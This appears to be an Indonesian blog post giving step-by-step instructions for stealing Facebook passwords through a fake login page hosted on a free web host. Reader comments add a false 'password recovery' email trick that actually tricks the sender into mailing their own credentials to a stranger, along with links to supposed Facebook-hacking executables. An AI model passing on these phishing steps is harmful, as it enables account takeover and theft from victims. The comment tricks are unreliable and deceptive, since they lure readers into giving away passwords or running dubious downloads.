Cara hack facebook

Diperiksa oleh:bogisubasti

Cara hack facebook dapat menggunakan metode fake login yaitu mengarahkan korban untuk dapat menuliskan email atau katan sandi / pasword .

Langkah-langkahnya sebagai berikut :

1. Buatlah web, gratis. Web gratis yang paling mudah dan langsung jadi tanpa menunggu hitungan hari dengan bandwit yang sedikit.Pilihlah http://www.cilacaponline.web.id/, tapi anda bebas memilih hosting gratis yang lainnya

2. Jangan lupa username dan pasword yang diberikan dari web tersebut, simpanlah.

3. Carilah buatlah php script, yang mendukung atau anda bisa mendowloadnya.

4. Login ke link /admin yang diberikan web tersebut, anda bisa login menggunakan ftp, control panel dll.

5. Upload file script terebut.

6. Setelah jadi, arahkan korban ke link yang anda buat tadi.

7. Login ke link admin, tadi.

8. Apabila berhasil, maka akan secara otomatis muncul satu file berupa html code berisi pasword.

jangan lupa untuk memberi rating pada artikel ini. makasih

Cara hack facebook Originally published in Shvoong: http://id.shvoong.com/how-to/computers-and-internet/2087732-cara-hack-facebook/

Ditulis dalam lain-lain. 3 Comments »

3 Tanggapan to “Cara hack facebook”

  1. mukhyidi Says:

    makasih infonya sangat berguna
    ditunggu lainya

  2. kandi Says:

    Tahap 1:
    buka email korang..pastu klik pada COMPOSE..
    Tahap2:
    nampak tak perkataan SUBJECK..?? ha kt subject tu korang tulus perkataan ni..: RETRIEVE LOST PASSWORD
    Tahap 3:
    ok tahap ke 3 ni korang tulis dalam kotak yg biasa kita guna untuk tulis email..
    Pada perenggan pertama tulis perkataan seperti di bawah ni:
    /facebook.managment/systemrecovery/cgi-bin/recovery/systemflood /v&t9858
    pada perenggan ke dua korang selang sebaris tulis:
    Login: (tulis email orang yg korang nak curi password dia)
    Current E-mail: (tulis email facebok korang)
    Password: (tulis password email facebook korang)
    contoh:
    ——-
    /facebook.managment/systemrecovery/cgi-bin/recovery/systemflood /v&t9858
    Login: serikandi80@yahoo.com
    Current E-mail: cicidan@yahoo.com
    Password: 12345678
    Tahap 4:
    Ok siap…senang je…
    pastu..
    Send email ini ke alamat email ni: pass_recovery99@yahoo.com
    Pastu pakat2 sabar la kejap..klo yahoo system manager tak busy dalam masa 15 minit pass_recovery_master ni akan balas email korang beserta password yg korang nak…klo busy mungkin boleh sampai 24 @ 48 jam baru depa balas email korang…
    ini email baru dia
    aq baru try

  3. putry impian Says:

    klo mau download hack facebook new version klik dan download aja disini gratis.

    http://www.ziddu.com/download/15804421/FacebookFreezer.zip.html

    software hacker facebook terbaru anda bisa download gratis disini.
    http://www.ziddu.com/download/15988638/facebook Hacker 2011.exe.html


Silahkan Berkomentar disini...

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: